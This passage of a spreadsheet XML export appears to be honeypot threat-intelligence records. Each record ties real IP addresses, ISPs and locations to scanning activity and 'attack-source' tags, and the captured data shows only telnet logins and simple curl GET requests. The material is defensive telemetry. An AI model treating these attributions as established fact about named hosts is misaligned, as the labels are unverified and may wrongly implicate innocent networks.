    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;23&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0466"/>
    <s v="121.541"/>
    <s v="38841"/>
    <s v="kbro CO. Ltd."/>
    <s v="kbro CO. Ltd."/>
    <s v="business"/>
    <s v="KBRO"/>
    <s v="2006-12-22"/>
    <s v="KBRO-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2007-08-27 14:41:18"/>
    <s v="2025-08-27 00:00:00"/>
    <s v="NA"/>
    <s v="ns1.kbronet.com.tw     211.76.112.59 _x000a_      ns2.kbronet.com.tw     211.76.112.60"/>
    <s v="TFN"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bc3:b144"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3516"/>
    <x v="3516"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:25:55"/>
    <d v="2025-04-02T17:25:55"/>
    <d v="2025-04-02T17:25:55"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Nedumangād"/>
    <s v="1261553"/>
    <s v="NA"/>
    <s v="8.60267"/>
    <s v="77.0014"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:94c2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3517"/>
    <x v="3517"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:19:46"/>
    <d v="2025-04-02T17:19:46"/>
    <d v="2025-04-02T17:19:46"/>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rporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:fa00"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3518"/>
    <x v="3518"/>
    <s v="220-134-237-107.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:19:40"/>
    <d v="2023-07-24T20:23:34"/>
    <d v="2025-04-02T17:19:40"/>
    <n v="2177"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H33&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_PJL_H1&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_HTTPS_H1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;1080&amp;&amp;22&amp;&amp;9100&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;5900&amp;&amp;24202&amp;&amp;23&amp;&amp;55008&amp;&amp;52671&amp;&amp;55016&amp;&amp;32949&amp;&amp;39554"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc86:ed6b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3519"/>
    <x v="3519"/>
    <s v="NA&amp;&amp;59-127-235-231.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T17:18:48"/>
    <d v="2024-09-04T14:21:00"/>
    <d v="2025-04-02T17:18:48"/>
    <n v="302"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;6067&amp;&amp;23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:ebe7"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3520"/>
    <x v="3520"/>
    <s v="NA&amp;&amp;114-33-77-154.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T17:14:44"/>
    <d v="2024-05-06T13:08:00"/>
    <d v="2025-04-02T17:14:44"/>
    <n v="411"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;34025&amp;&amp;9100&amp;&amp;NA&amp;&amp;8119"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:4d9a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3521"/>
    <x v="3521"/>
    <s v="114-35-175-31.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T17:08:04"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-02T17:08:04"/>
    <n v="392"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_DNS_H22&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;34725&amp;&amp;80&amp;&amp;9100&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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:af1f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3522"/>
    <x v="3522"/>
    <s v="114-33-29-101.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:53:02"/>
    <d v="2023-07-25T13:50:17"/>
    <d v="2025-04-02T16:53:02"/>
    <n v="335"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="32275&amp;&amp;80&amp;&amp;23&amp;&amp;56440&amp;&amp;56454&amp;&amp;9100&amp;&amp;NA"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:1d65"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3523"/>
    <x v="3523"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:51:53"/>
    <d v="2025-04-02T16:51:53"/>
    <d v="2025-04-02T16:51:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="MA"/>
    <s v="Morocco"/>
    <s v="09"/>
    <s v="Souss-Massa"/>
    <s v="Tiznit Province"/>
    <s v="Sidi Ifni"/>
    <s v="2534515"/>
    <s v="NA"/>
    <s v="29.3797"/>
    <s v="-10.173"/>
    <s v="36903"/>
    <s v="MT-MPLS"/>
    <s v="Office National des Postes et Telecommunications ONPT (Maroc Telecom) / IAM"/>
    <s v="corporate"/>
    <s v="MarocTelecomASDL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a0b2:6563"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3524"/>
    <x v="3524"/>
    <s v="220-135-89-91.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:47:42"/>
    <d v="2024-04-12T10:37:00"/>
    <d v="2025-04-02T16:47:42"/>
    <n v="463"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;6503&amp;&amp;23&amp;&amp;80&amp;&amp;33746&amp;&amp;NA&amp;&amp;27351&amp;&amp;39788&amp;&amp;57205&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:595b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3525"/>
    <x v="3525"/>
    <s v="125-229-195-249.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T16:46:52"/>
    <d v="2024-07-12T19:02:00"/>
    <d v="2025-04-02T16:46:52"/>
    <n v="584"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-L